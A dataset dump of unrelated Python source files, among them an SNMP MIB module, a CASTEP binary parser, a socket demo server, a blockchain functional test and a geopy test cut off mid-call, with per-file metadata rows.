ValueRangeConstraint, ConstraintsIntersection, SingleValueConstraint, ConstraintsUnion, ValueSizeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "ConstraintsIntersection", "SingleValueConstraint", "ConstraintsUnion", "ValueSizeConstraint")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
Integer32, iso, MibScalar, MibTable, MibTableRow, MibTableColumn, MibIdentifier, NotificationType, TimeTicks, mib_2, ObjectIdentity, Bits, Counter64, Gauge32, Unsigned32, ModuleIdentity, Counter32, IpAddress = mibBuilder.importSymbols("SNMPv2-SMI", "Integer32", "iso", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "MibIdentifier", "NotificationType", "TimeTicks", "mib-2", "ObjectIdentity", "Bits", "Counter64", "Gauge32", "Unsigned32", "ModuleIdentity", "Counter32", "IpAddress")
DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention")
ianaMallocMIB = ModuleIdentity((1, 3, 6, 1, 2, 1, 102))
ianaMallocMIB.setRevisions(('2014-05-22 00:00', '2003-01-27 12:00',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: ianaMallocMIB.setRevisionsDescriptions(('Updated contact info.', 'Initial version.',))
if mibBuilder.loadTexts: ianaMallocMIB.setLastUpdated('201405220000Z')
if mibBuilder.loadTexts: ianaMallocMIB.setOrganization('IANA')
if mibBuilder.loadTexts: ianaMallocMIB.setContactInfo(' Internet Assigned Numbers Authority Internet Corporation for Assigned Names and Numbers 12025 Waterfront Drive, Suite 300 Los Angeles, CA 90094-2536 Phone: +1 310-301-5800 EMail: iana&iana.org')
if mibBuilder.loadTexts: ianaMallocMIB.setDescription('This MIB module defines the IANAscopeSource and IANAmallocRangeSource textual conventions for use in MIBs which need to identify ways of learning multicast scope and range information. Any additions or changes to the contents of this MIB module require either publication of an RFC, or Designated Expert Review as defined in the Guidelines for Writing IANA Considerations Section document. The Designated Expert will be selected by the IESG Area Director(s) of the Transport Area.')
class IANAscopeSource(TextualConvention, Integer32):
description = 'The source of multicast scope information.'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))
namedValues = NamedValues(("other", 1), ("manual", 2), ("local", 3), ("mzap", 4), ("madcap", 5))
class IANAmallocRangeSource(TextualConvention, Integer32):
description = 'The source of multicast address allocation range information.'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3))
namedValues = NamedValues(("other", 1), ("manual", 2), ("local", 3))
mibBuilder.exportSymbols("IANA-MALLOC-MIB", IANAmallocRangeSource=IANAmallocRangeSource, IANAscopeSource=IANAscopeSource, ianaMallocMIB=ianaMallocMIB, PYSNMP_MODULE_ID=ianaMallocMIB)
| 100.166667
| 537
| 0.781475
| 663
| 0.18386
| 0
| 0
| 0
| 0
| 0
| 0
| 1,836
| 0.509151
|
fbe96376f6c7e8ea5a7177b454718260bda00d58
| 112
|
py
|
Python
|
api/base/views/__init__.py
|
simpsonw/atmosphere
|
3a5203ef0b563de3a0e8c8c8715df88186532d7a
|
[
"BSD-3-Clause"
] | 197
|
2016-12-08T02:33:32.000Z
|
2022-03-23T14:27:47.000Z
|
api/base/views/__init__.py
|
simpsonw/atmosphere
|
3a5203ef0b563de3a0e8c8c8715df88186532d7a
|
[
"BSD-3-Clause"
] | 385
|
2017-01-03T22:51:46.000Z
|
2020-12-16T16:20:42.000Z
|
api/base/views/__init__.py
|
benlazarine/atmosphere
|
38fad8e4002e510e8b4294f2bb5bc75e8e1817fa
|
[
"BSD-3-Clause"
] | 50
|
2016-12-08T08:32:25.000Z
|
2021-12-10T00:21:39.000Z
|
from .version import VersionViewSet, DeployVersionViewSet
__all__ = ["VersionViewSet", "DeployVersionViewSet"]
| 28
| 57
| 0.821429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 38
| 0.339286
|
fbed4a160c462e80695d00929515e53d559a44ef
| 455
|
py
|
Python
|
amaranth/vendor/xilinx_spartan_3_6.py
|
psumesh/nmigen
|
7d611b8fc1d9e58853ff268ec38ff8f4131a9774
|
[
"BSD-2-Clause"
] | 528
|
2020-01-28T18:21:00.000Z
|
2021-12-09T06:27:51.000Z
|
amaranth/vendor/xilinx_spartan_3_6.py
|
psumesh/nmigen
|
7d611b8fc1d9e58853ff268ec38ff8f4131a9774
|
[
"BSD-2-Clause"
] | 360
|
2020-01-28T18:34:30.000Z
|
2021-12-10T08:03:32.000Z
|
amaranth/vendor/xilinx_spartan_3_6.py
|
psumesh/nmigen
|
7d611b8fc1d9e58853ff268ec38ff8f4131a9774
|
[
"BSD-2-Clause"
] | 100
|
2020-02-06T21:55:46.000Z
|
2021-11-25T19:20:44.000Z
|
import warnings
from .xilinx import XilinxPlatform
__all__ = ["XilinxSpartan3APlatform", "XilinxSpartan6Platform"]
XilinxSpartan3APlatform = XilinxPlatform
XilinxSpartan6Platform = XilinxPlatform
# TODO(amaranth-0.4): remove
warnings.warn("instead of amaranth.vendor.xilinx_spartan_3_6.XilinxSpartan3APlatform and "
".XilinxSpartan6Platform, use amaranth.vendor.xilinx.XilinxPlatform",
DeprecationWarning, stacklevel=2)
| 26.764706
| 90
| 0.782418
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 221
| 0.485714
|
fbee0d4e9115c00d9a52094547d27c43033ebffb
| 2,968
|
py
|
Python
|
spatialtis/_plotting/api/community_map.py
|
Mr-Milk/SpatialTis
|
bcdc6df5213b8b256cbe4c9a7c0f3b5e6d3c56b6
|
[
"Apache-2.0"
] | 10
|
2020-07-14T13:27:35.000Z
|
2021-11-24T21:41:30.000Z
|
spatialtis/_plotting/api/community_map.py
|
Mr-Milk/SpatialTis
|
bcdc6df5213b8b256cbe4c9a7c0f3b5e6d3c56b6
|
[
"Apache-2.0"
] | 21
|
2021-01-10T09:39:25.000Z
|
2022-03-12T01:04:52.000Z
|
spatialtis/_plotting/api/community_map.py
|
Mr-Milk/SpatialTis
|
bcdc6df5213b8b256cbe4c9a7c0f3b5e6d3c56b6
|
[
"Apache-2.0"
] | null | null | null |
from ast import literal_eval
from collections import Counter
from typing import Dict, Optional
from anndata import AnnData
from spatialtis.config import Config, analysis_list
from ...utils import doc
from ..base import graph_position_interactive, graph_position_static
from .utils import query_df
@doc
def community_map(
data: AnnData,
roi: Dict,
min_cells: int = 10,
use: str = "static",
community_key: Optional[str] = None,
centroid_key: Optional[str] = None,
neighbors_key: Optional[str] = None,
**plot_options,
):
"""Visualize cell communities in ROI
Args:
data: {adata_plotting}
roi: {roi}
min_cells: Show communities contain more than a number of cells
use: "static" or "interactive" (Default: "static")
community_key: {community_key}
centroid_key: {centroid_key}
neighbors_key: {neighbors_key}
**plot_options: Pass to :class:`spatialtis._plotting.base.graph_position_static` or
:class:`spatialtis._plotting.base.graph_position_interactive`
{pyecharts_tips}
"""
if community_key is None:
community_key = analysis_list["cell_community"].last_used_key
if centroid_key is None:
centroid_key = Config.centroid_key
if neighbors_key is None:
neighbors_key = Config.NEIGHBORS_KEY
df = query_df(data.obs, roi)
nodes_types = df[community_key].tolist()
commus = []
for commu, count in Counter(nodes_types).items():
if count >= min_cells:
commus.append(commu)
df = df.reset_index(drop=True)
xdf = df[df[community_key].isin(commus)]
xdf = xdf.reset_index()
if len(xdf) == 0:
raise ValueError("Seems like there is no cells left to be drawn")
need_eval_nodes = isinstance(xdf[centroid_key][0], str)
need_eval_neighs = isinstance(xdf[neighbors_key][0], str)
if need_eval_nodes:
nodes = [literal_eval(n) for n in xdf[centroid_key]]
else:
nodes = [n for n in xdf[centroid_key]]
if need_eval_neighs:
neighs = [literal_eval(n) for n in xdf[neighbors_key]]
else:
neighs = [n for n in xdf[neighbors_key]]
nodes_types = xdf[community_key]
edges = []
edges_types = []
for i, n in zip(xdf.index, neighs):
for x in n:
new_x = xdf[xdf["index"] == x].index
if len(new_x) == 1:
new_x = new_x[0]
if nodes_types[i] == nodes_types[new_x]:
edges.append((i, new_x))
edges_types.append(nodes_types[i])
plot_options["saved_name"] = "community_map_" + ",".join(
[f"{k}={v}" for k, v in roi.items()]
)
if use == "interactive":
return graph_position_interactive(
nodes, edges, edges_types=edges_types, **plot_options
)
else:
return graph_position_static(
nodes, edges, edges_types=edges_types, **plot_options
)
| 31.242105
| 91
| 0.637466
| 0
| 0
| 0
| 0
| 2,665
| 0.897911
| 0
| 0
| 672
| 0.226415
|
fbef292579d80d2de80ed4ab24cb1a2133c269b6
| 7,209
|
py
|
Python
|
pynics/binparse/castep_bin_results.py
|
ThatPerson/pynics
|
ae9dd58fa4353c4907f6fd7d6ad368029a4288f1
|
[
"MIT"
] | 2
|
2019-10-03T21:18:17.000Z
|
2019-10-05T13:08:36.000Z
|
pynics/binparse/castep_bin_results.py
|
ThatPerson/pynics
|
ae9dd58fa4353c4907f6fd7d6ad368029a4288f1
|
[
"MIT"
] | 2
|
2021-06-25T15:11:27.000Z
|
2021-10-04T13:23:04.000Z
|
pynics/binparse/castep_bin_results.py
|
ThatPerson/pynics
|
ae9dd58fa4353c4907f6fd7d6ad368029a4288f1
|
[
"MIT"
] | 1
|
2021-06-25T14:32:07.000Z
|
2021-06-25T14:32:07.000Z
|
# Python 2-to-3 compatibility code
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import collections
from pynics.binparse.forbinfile import RecordError
def cbin_results_parse(binfile, results_store, curr_version, params,
current_cell, tolerant=False):
# First, parse the elec results part (always present)
results_store['elec'] = collections.OrderedDict()
cbin_elec_parse(binfile, results_store[
'elec'], curr_version, params, current_cell)
# Then go for the optional stuff
cbin_optional_parse(binfile, results_store, curr_version)
def cbin_elec_parse(binfile, elec_store, curr_version, params, current_cell):
# A few informations are stored
elec_store['found_ground_state_wvfn'] = not (
binfile.read_record('i')[0] == 0) # Logical value
elec_store['found_ground_state_den'] = not (
binfile.read_record('i')[0] == 0) # Logical value
elec_store['total_energy'] = binfile.read_record('d')[0]
elec_store['fermi_energy'] = binfile.read_record('d')
# Fermi energy for both spins if we have two. This relies on param being
# already parsed
if params['nspins'] == 2:
elec_store['fermi_energy'] = (elec_store['fermi_energy'][
0], elec_store['fermi_energy'][0])
elec_store['wvfn_nbands'], elec_store[
'wvfn_nspins'] = binfile.read_record('i')
# Read occupation eigenvalues for the Kohn-Sham states. This relies on
# cell being already parsed
elec_store['occupation'] = {}
for kp_i in range(0, current_cell['nkpts']):
kp = binfile.read_record('d')
elec_store['occupation'][kp] = {'occ': [], 'nrg': []}
for ns_i in range(0, elec_store['wvfn_nspins']):
elec_store['occupation'][kp]['occ'].append(
binfile.read_record('d')) # Occupation
elec_store['occupation'][kp]['nrg'].append(
binfile.read_record('d')) # Energies
# Why is this here again? Whatever.
elec_store['found_ground_state_den'] = not (
binfile.read_record('i')[0] == 0) # Logical value
# Read the fine grid size, keep the information because it is of use for
# various other parsing operations
elec_store['model_ngx_fine'], elec_store['model_ngy_fine'], elec_store[
'model_ngz_fine'] = binfile.read_record('i')
# Finally, dummy read of density
for n in range(0, elec_store['model_ngx_fine'] *
elec_store['model_ngy_fine']):
dummy_int = binfile.read_record('i')
def cbin_optional_parse(binfile, results_store, curr_version, tolerant=False):
if (tolerant): # In this case, unknown sections will simply be ignored
def skip_optional():
while True:
header = self.binfile.read_string_record()
if header.isalpha():
self.binfile.backspace()
break
try:
while True:
header = binfile.read_string_record()
if (header == 'END'):
break
try:
castep_bin_olist[header](binfile, results_store, curr_version)
except KeyError:
if (tolerant):
print("Skipping unrecognized header " + header)
skip_optional()
else:
# The default case, doesn't account for forward
# compatibility for now
raise CastepBinError('Unknown optional section found')
except RecordError:
raise CastepBinError(
'End of file reached while parsing optional blocks')
# Utility routine
def tensor_reshape(V):
return tuple([
tuple([
tuple([V[i+j+k] for i in range(0, 3)
]) for j in range(0, 9, 3)
]) for k in range(0, len(V), 9)])
def opt_e_fermi_parse(binfile, results_store, curr_version):
# Parse Fermi energy for second spin
efermi_2 = binfile.read_record('d')[0]
results_store['elec']['fermi_energy'] = (
results_store['elec']['fermi_energy'][0], efermi_2)
def opt_oep_pot_parse(binfile, results_store, curr_version):
# Parse optimized effective potential
results_store['oep_pot'] = {}
results_store['oep_pot']['found_oep_ground_state'] = not (
binfile.read_record('i') == 0)
results_store['oep_pot']['oep_energy_difference'] = (binfile
.read_record('d')[0])
# We need nspins, we get it indirectly
nspins = len(results_store['elec']['fermi_energy'])
ngx_fine = results_store['elec']['model_ngx_fine']
ngy_fine = results_store['elec']['model_ngy_fine']
ngz_fine = results_store['elec']['model_ngz_fine']
# Sort of necessary to initialize here
results_store['oep_pot']['pot_fine'] = [[0.0 for s in range(
0, nspins)]]*ngx_fine*ngy_fine*ngz_fine
for s_i in range(0, nspins):
for nx1 in range(0, ngx_fine):
for ny1 in range(0, ngy_fine):
nx, ny, grid_charge_r, grid_charge_im = binfile.read_record(
'iidd')
# Fortran convention needs to be used
for nz in range(1, ngz_fine+1):
# Back to Python convention, arrays count from 0
igrid = (nx-1)+(ny-1)*ngx_fine+(nz-1)*ngx_fine*ngy_fine
results_store['oep_pot']['pot_fine'][igrid][
s_i] = (grid_charge_r, grid_charge_im)
def opt_de_dloge_parse(binfile, results_store, curr_version):
# Parse energy logarithmic derivative
results_store['de_dloge'] = binfile.read_record('d')[0]
def opt_forces_parse(binfile, results_store, curr_version):
# Parse forces
f = binfile.read_record('d')
# Reshape
results_store['forces'] = tuple(
[tuple([f[i+j] for i in range(0, 3)]) for j in range(0, len(f), 3)])
def opt_stress_parse(binfile, results_store, curr_version):
# Parse stress & strain tensors
results_store['stress'] = {}
stress = binfile.read_record('d')
strain = binfile.read_record('d')
results_store['stress']['stress'] = stress
results_store['stress']['strain'] = tensor_reshape(strain)
def opt_shielding_parse(binfile, results_store, curr_version):
# Parse NMR shieldings
results_store['shielding'] = {}
results_store['shielding']['ms'] = binfile.read_record('d')
results_store['shielding']['sus'] = binfile.read_record('d')
# Reshape ms as a list of tensors
results_store['shielding']['ms'] = tensor_reshape(
results_store['shielding']['ms'])
def opt_efg_parse(binfile, results_store, curr_version):
results_store['efg'] = binfile.read_record('d')
results_store['efg'] = tensor_reshape(results_store['efg'])
castep_bin_olist = {
'E_FERMI': opt_e_fermi_parse,
'OEP_POT': opt_oep_pot_parse,
'DE_DLOGE': opt_de_dloge_parse,
'FORCES': opt_forces_parse,
'STRESS': opt_stress_parse,
'SHIELDING': opt_shielding_parse,
'EFG': opt_efg_parse,
}
| 34.826087
| 78
| 0.629768
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,085
| 0.289222
|
fbef307f38bef0fc49bdcc1050b0a7022b885117
| 1,084
|
py
|
Python
|
epi-poc-demo/node-b/node-b.py
|
onnovalkering/epif-poc
|
0fac10ce59037fbf8725f09808813dbab71ff70a
|
[
"Apache-2.0"
] | null | null | null |
epi-poc-demo/node-b/node-b.py
|
onnovalkering/epif-poc
|
0fac10ce59037fbf8725f09808813dbab71ff70a
|
[
"Apache-2.0"
] | null | null | null |
epi-poc-demo/node-b/node-b.py
|
onnovalkering/epif-poc
|
0fac10ce59037fbf8725f09808813dbab71ff70a
|
[
"Apache-2.0"
] | null | null | null |
import os
import socket
import threading
HEADER = 64
PORT = 5053
FW = "192.168.101.2"
ADDR = (FW, PORT)
FORMAT = 'utf-8'
DISCONNECT_MESSAGE = "!DISCONNECT"
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(ADDR)
def handle_client(conn, addr):
print(f"[FIREWALL CONNECTION] {addr} connected.")
connected = True
while connected:
msg_length = conn.recv(HEADER).decode(FORMAT)
if msg_length:
msg_length = int(msg_length)
msg = conn.recv(msg_length).decode(FORMAT)
if msg == DISCONNECT_MESSAGE:
connected = False
print(f"[{addr}] {msg}")
conn.send("Msg received".encode(FORMAT))
conn.close()
def start():
server.listen()
print(f"[LISTENING] firewall is running on {FW}")
while True:
conn, addr = server.accept()
thread = threading.Thread(target=handle_client, args=(conn, addr))
thread.start()
print(f"[ACTIVE CONNECTIONS] {threading.activeCount() - 1}")
print("[STARTING] server is starting...")
start()
| 23.565217
| 74
| 0.628229
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 237
| 0.218635
|
fbef8b98b95a0bd508e97ef365acd9e2c1cbd2ce
| 652
|
py
|
Python
|
sliding_window/equal_substring.py
|
sleebapaul/codeforces
|
50c8bff0b36e6ce7e8f89c7c827ae8845f80098e
|
[
"MIT"
] | null | null | null |
sliding_window/equal_substring.py
|
sleebapaul/codeforces
|
50c8bff0b36e6ce7e8f89c7c827ae8845f80098e
|
[
"MIT"
] | null | null | null |
sliding_window/equal_substring.py
|
sleebapaul/codeforces
|
50c8bff0b36e6ce7e8f89c7c827ae8845f80098e
|
[
"MIT"
] | null | null | null |
"""
1208. Get Equal Substrings Within Budget
Straight forward. Asked the max len, so count the max each time.
"""
class Solution:
def equalSubstring(self, s: str, t: str, maxCost: int) -> int:
cost = 0
window_start = 0
result = 0
for window_end in range(len(s)):
cost += abs(ord(s[window_end]) - ord(t[window_end]))
if cost > maxCost:
cost -= abs(ord(s[window_start]) - ord(t[window_start]))
window_start += 1
result = max(result, window_end - window_start+1)
return result
| 27.166667
| 72
| 0.518405
| 534
| 0.819018
| 0
| 0
| 0
| 0
| 0
| 0
| 115
| 0.17638
|
fbef9d38a58cfa2a1c22c680025cec376e6993bf
| 13,836
|
py
|
Python
|
test/functional/esperanza_withdraw.py
|
frolosofsky/unit-e
|
d3d12508b915986841bd19c4dee9e50dd662a112
|
[
"MIT"
] | null | null | null |
test/functional/esperanza_withdraw.py
|
frolosofsky/unit-e
|
d3d12508b915986841bd19c4dee9e50dd662a112
|
[
"MIT"
] | null | null | null |
test/functional/esperanza_withdraw.py
|
frolosofsky/unit-e
|
d3d12508b915986841bd19c4dee9e50dd662a112
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2018-2019 The Unit-e developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
from test_framework.test_framework import UnitETestFramework
from test_framework.util import (
json,
connect_nodes,
disconnect_nodes,
assert_equal,
assert_finalizationstate,
assert_raises_rpc_error,
sync_blocks,
wait_until,
)
from decimal import Decimal
import time
LOGOUT_DYNASTY_DELAY = 3
WITHDRAW_EPOCH_DELAY = 12
class EsperanzaWithdrawTest(UnitETestFramework):
def set_test_params(self):
self.num_nodes = 3
esperanza_config = {
'dynastyLogoutDelay': LOGOUT_DYNASTY_DELAY,
'withdrawalEpochDelay': WITHDRAW_EPOCH_DELAY
}
json_params = json.dumps(esperanza_config)
finalizer_node_params = ['-esperanzaconfig=' + json_params, '-validating=1']
proposer_node_params = ['-esperanzaconfig=' + json_params]
self.extra_args = [
proposer_node_params,
finalizer_node_params,
finalizer_node_params,
]
self.setup_clean_chain = True
# create topology where arrows denote non-persistent connection
# finalizer1 → proposer ← finalizer2
def setup_network(self):
self.setup_nodes()
proposer = self.nodes[0]
finalizer1 = self.nodes[1]
finalizer2 = self.nodes[2]
connect_nodes(finalizer1, proposer.index)
connect_nodes(finalizer2, proposer.index)
def run_test(self):
proposer = self.nodes[0]
finalizer1 = self.nodes[1]
finalizer2 = self.nodes[2]
self.setup_stake_coins(*self.nodes)
# Leave IBD
proposer.generatetoaddress(1, proposer.getnewaddress('', 'bech32'))
sync_blocks([proposer, finalizer1, finalizer2], timeout=10)
finalizer1_address = finalizer1.getnewaddress('', 'legacy')
# create deposits
# F
# e0 - e1
# d1
# d2
d1 = finalizer1.deposit(finalizer1_address, 1500)
d2 = finalizer2.deposit(finalizer2.getnewaddress('', 'legacy'), 1500)
self.wait_for_transaction(d1, timeout=10)
self.wait_for_transaction(d2, timeout=10)
proposer.generatetoaddress(1, proposer.getnewaddress('', 'bech32'))
sync_blocks([proposer, finalizer1, finalizer2], timeout=10)
disconnect_nodes(finalizer1, proposer.index)
disconnect_nodes(finalizer2, proposer.index)
assert_equal(proposer.getblockcount(), 2)
assert_finalizationstate(proposer, {'currentDynasty': 0,
'currentEpoch': 1,
'lastJustifiedEpoch': 0,
'lastFinalizedEpoch': 0,
'validators': 0})
self.log.info('deposits are created')
# Generate enough blocks to activate deposits
# F F F F J
# e0 - e1 - e2 - e3 - e4 - e5 - e6[26]
# d1
# d2
proposer.generatetoaddress(3 + 5 + 5 + 5 + 5, proposer.getnewaddress('', 'bech32'))
assert_equal(proposer.getblockcount(), 25)
assert_finalizationstate(proposer, {'currentDynasty': 2,
'currentEpoch': 5,
'lastJustifiedEpoch': 4,
'lastFinalizedEpoch': 3,
'validators': 0})
proposer.generatetoaddress(1, proposer.getnewaddress('', 'bech32'))
assert_equal(proposer.getblockcount(), 26)
assert_finalizationstate(proposer, {'currentDynasty': 3,
'currentEpoch': 6,
'lastJustifiedEpoch': 4,
'lastFinalizedEpoch': 3,
'validators': 2})
self.log.info('finalizers are created')
# Logout finalizer1
# F F F F J
# e0 - e1 - e2 - e3 - e4 - e5 - e6[26]
# d1 l1
# d2
self.wait_for_vote_and_disconnect(finalizer=finalizer1, node=proposer)
self.wait_for_vote_and_disconnect(finalizer=finalizer2, node=proposer)
# TODO UNIT-E: logout tx can't be created if its vote is not in the block
# we should check that input of logout tx is in the mempool too
proposer.generatetoaddress(1, proposer.getnewaddress('', 'bech32'))
connect_nodes(finalizer1, proposer.index)
sync_blocks([finalizer1, proposer], timeout=10)
l1 = finalizer1.logout()
wait_until(lambda: l1 in proposer.getrawmempool(), timeout=10)
disconnect_nodes(finalizer1, proposer.index)
proposer.generatetoaddress(3, proposer.getnewaddress('', 'bech32'))
assert_equal(proposer.getblockcount(), 30)
assert_finalizationstate(proposer, {'currentDynasty': 3,
'currentEpoch': 6,
'lastJustifiedEpoch': 5,
'lastFinalizedEpoch': 4,
'validators': 2})
self.log.info('finalizer1 logged out in dynasty=3')
# During LOGOUT_DYNASTY_DELAY both finalizers can vote.
# Since the finalization happens at every epoch,
# number of dynasties is equal to number of epochs.
for _ in range(LOGOUT_DYNASTY_DELAY):
proposer.generatetoaddress(1, proposer.getnewaddress('', 'bech32'))
self.wait_for_vote_and_disconnect(finalizer=finalizer1, node=proposer)
self.wait_for_vote_and_disconnect(finalizer=finalizer2, node=proposer)
proposer.generatetoaddress(4, proposer.getnewaddress('', 'bech32'))
assert_equal(proposer.getblockcount(), 45)
assert_finalizationstate(proposer, {'currentDynasty': 6,
'currentEpoch': 9,
'lastJustifiedEpoch': 8,
'lastFinalizedEpoch': 7,
'validators': 2})
self.log.info('finalizer1 voted during logout delay successfully')
# During WITHDRAW_DELAY finalizer1 can't vote and can't withdraw
proposer.generatetoaddress(1, proposer.getnewaddress('', 'bech32'))
assert_finalizationstate(proposer, {'currentDynasty': 7,
'currentEpoch': 10,
'lastJustifiedEpoch': 8,
'lastFinalizedEpoch': 7,
'validators': 1})
self.wait_for_vote_and_disconnect(finalizer=finalizer2, node=proposer)
proposer.generatetoaddress(1, proposer.getnewaddress('', 'bech32'))
assert_finalizationstate(proposer, {'currentDynasty': 7,
'currentEpoch': 10,
'lastJustifiedEpoch': 9,
'lastFinalizedEpoch': 8,
'validators': 1})
# finalizer1 can't vote so we keep it connected
connect_nodes(finalizer1, proposer.index)
time.sleep(2) # ensure no votes from finalizer1
assert_equal(len(proposer.getrawmempool()), 0)
proposer.generatetoaddress(3, proposer.getnewaddress('', 'bech32'))
assert_equal(proposer.getblockcount(), 50)
assert_finalizationstate(proposer, {'currentDynasty': 7,
'currentEpoch': 10,
'lastJustifiedEpoch': 9,
'lastFinalizedEpoch': 8,
'validators': 1})
# WITHDRAW_DELAY - 2 is because:
# -1 as we checked the first loop manually
# -1 as at this epoch we should be able to withdraw already
for _ in range(WITHDRAW_EPOCH_DELAY - 2):
proposer.generatetoaddress(1, proposer.getnewaddress('', 'bech32'))
self.wait_for_vote_and_disconnect(finalizer=finalizer2, node=proposer)
proposer.generatetoaddress(4, proposer.getnewaddress('', 'bech32'))
assert_equal(proposer.getblockcount(), 100)
assert_finalizationstate(proposer, {'currentDynasty': 17,
'currentEpoch': 20,
'lastJustifiedEpoch': 19,
'lastFinalizedEpoch': 18,
'validators': 1})
# last block that finalizer1 can't withdraw
# TODO UNIT-E: allow to create a withdraw tx on checkpoint
# as it will be added to the block on the next epoch only.
# We have an known issue https://github.com/dtr-org/unit-e/issues/643
# that finalizer can't vote after checkpoint is processed, it looks that
# finalizer can't create any finalizer commits at this point (and only at this point).
assert_raises_rpc_error(-8, 'Cannot send withdraw transaction.', finalizer1.withdraw, finalizer1_address)
self.log.info('finalizer1 could not withdraw during WITHDRAW_DELAY period')
# test that deposit can be withdrawn
# e0 - e1 - ... - e6 - ... - e21[101, 102]
# d1 l1 w1
# d2
proposer.generatetoaddress(1, proposer.getnewaddress('', 'bech32'))
self.wait_for_vote_and_disconnect(finalizer=finalizer2, node=proposer)
assert_equal(proposer.getblockcount(), 101)
assert_finalizationstate(proposer, {'currentDynasty': 18,
'currentEpoch': 21,
'lastJustifiedEpoch': 19,
'lastFinalizedEpoch': 18,
'validators': 1})
sync_blocks([proposer, finalizer1], timeout=10)
w1 = finalizer1.withdraw(finalizer1_address)
wait_until(lambda: w1 in proposer.getrawmempool(), timeout=10)
proposer.generatetoaddress(1, proposer.getnewaddress('', 'bech32'))
sync_blocks([proposer, finalizer1])
self.log.info('finalizer1 was able to withdraw deposit at dynasty=18')
# test that withdraw commit can be spent
# test that deposit can be withdrawn
# e0 - e1 - ... - e6 - ... - e21[101, 102, 103]
# d1 l1 w1 spent_w1
# d2
spent_w1_raw = finalizer1.createrawtransaction(
[{'txid': w1, 'vout': 0}], {finalizer1_address: Decimal('1499.999')})
spent_w1_signed = finalizer1.signrawtransaction(spent_w1_raw)
spent_w1 = finalizer1.sendrawtransaction(spent_w1_signed['hex'])
self.wait_for_transaction(spent_w1, nodes=[proposer])
# mine block
block_hash = proposer.generatetoaddress(1, proposer.getnewaddress('', 'bech32'))[0]
assert spent_w1 in proposer.getblock(block_hash)['tx']
self.log.info('finalizer1 was able to spend withdraw commit')
# Test that after withdraw the node can deposit again
sync_blocks([proposer, finalizer1], timeout=10)
assert_equal(proposer.getblockcount(), 103)
wait_until(lambda: finalizer1.getvalidatorinfo()['validator_status'] == 'NOT_VALIDATING',
timeout=5)
deposit = finalizer1.deposit(finalizer1.getnewaddress('', 'legacy'), 1500)
wait_until(lambda: finalizer1.getvalidatorinfo()['validator_status'] == 'WAITING_DEPOSIT_CONFIRMATION',
timeout=5)
self.wait_for_transaction(deposit, timeout=10, nodes=[proposer, finalizer1])
proposer.generate(1)
sync_blocks([proposer, finalizer1], timeout=10)
assert_equal(proposer.getblockcount(), 104)
wait_until(lambda: finalizer1.getvalidatorinfo()['validator_status'] == 'WAITING_DEPOSIT_FINALIZATION',
timeout=20)
self.log.info('finalizer1 deposits again')
disconnect_nodes(finalizer1, proposer.index)
proposer.generate(2)
self.wait_for_vote_and_disconnect(finalizer=finalizer2, node=proposer)
assert_equal(proposer.getblockcount(), 106)
proposer.generate(5)
self.wait_for_vote_and_disconnect(finalizer=finalizer2, node=proposer)
assert_equal(proposer.getblockcount(), 111)
assert_finalizationstate(proposer, {'currentDynasty': 20,
'currentEpoch': 23,
'lastJustifiedEpoch': 21,
'lastFinalizedEpoch': 20,
'validators': 1})
proposer.generate(5)
self.wait_for_vote_and_disconnect(finalizer=finalizer2, node=proposer)
assert_equal(proposer.getblockcount(), 116)
assert_finalizationstate(proposer, {'currentDynasty': 21,
'currentEpoch': 24,
'lastJustifiedEpoch': 22,
'lastFinalizedEpoch': 21,
'validators': 2})
self.wait_for_vote_and_disconnect(finalizer=finalizer1, node=proposer)
self.log.info('finalizer1 votes again')
if __name__ == '__main__':
EsperanzaWithdrawTest().main()
| 46.901695
| 113
| 0.568661
| 13,215
| 0.954841
| 0
| 0
| 0
| 0
| 0
| 0
| 3,760
| 0.271676
|
fbf016290a6953a4fa95305b7831cd89ba6cb242
| 2,213
|
py
|
Python
|
test/geocoders/placefinder.py
|
gongso1st/geopy
|
9252f4b12197ff3c5e3fae50d9bae74974d5d20f
|
[
"MIT"
] | 1
|
2019-07-17T14:38:52.000Z
|
2019-07-17T14:38:52.000Z
|
test/geocoders/placefinder.py
|
gongso1st/geopy
|
9252f4b12197ff3c5e3fae50d9bae74974d5d20f
|
[
"MIT"
] | null | null | null |
test/geocoders/placefinder.py
|
gongso1st/geopy
|
9252f4b12197ff3c5e3fae50d9bae74974d5d20f
|
[
"MIT"
] | 1
|
2021-06-28T01:20:12.000Z
|
2021-06-28T01:20:12.000Z
|
import unittest
from geopy.compat import u
from geopy.point import Point
from geopy.geocoders import YahooPlaceFinder
from test.geocoders.util import GeocoderTestBase, env
class YahooPlaceFinderTestCaseUnitTest(GeocoderTestBase): # pylint: disable=R0904,C0111
def test_user_agent_custom(self):
geocoder = YahooPlaceFinder(
consumer_key='DUMMYKEY1234',
consumer_secret='DUMMYSECRET',
user_agent='my_user_agent/1.0'
)
self.assertEqual(geocoder.headers['User-Agent'], 'my_user_agent/1.0')
@unittest.skipUnless( # pylint: disable=R0904,C0111
bool(env.get('YAHOO_KEY')) and bool(env.get('YAHOO_SECRET')),
"YAHOO_KEY and YAHOO_SECRET env variables not set"
)
class YahooPlaceFinderTestCase(GeocoderTestBase): # pylint: disable=R0904,C0111
@classmethod
def setUpClass(cls):
cls.geocoder = YahooPlaceFinder(
env['YAHOO_KEY'],
env['YAHOO_SECRET']
)
def test_geocode(self):
"""
YahooPlaceFinder.geocode
"""
self.geocode_run(
